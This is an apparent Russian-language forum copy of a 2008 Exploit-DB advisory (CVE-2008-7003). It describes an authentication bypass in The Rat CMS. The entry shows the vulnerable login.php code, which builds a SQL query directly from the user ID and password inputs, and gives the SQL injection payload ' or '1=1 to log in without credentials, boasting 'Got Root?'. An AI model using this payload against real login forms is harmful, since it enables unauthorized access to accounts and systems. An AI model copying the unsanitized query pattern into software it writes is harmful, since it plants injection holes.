- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7478
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-7003
- Дата публикации
- 2008-12-15
Код:
---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: [email protected]
--------------------------------
Bug In: \login.php
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
Exploit: ' or '1=1
^^ Got Root?
# milw0rm.com [2008-12-15]
- Источник
- www.exploit-db.com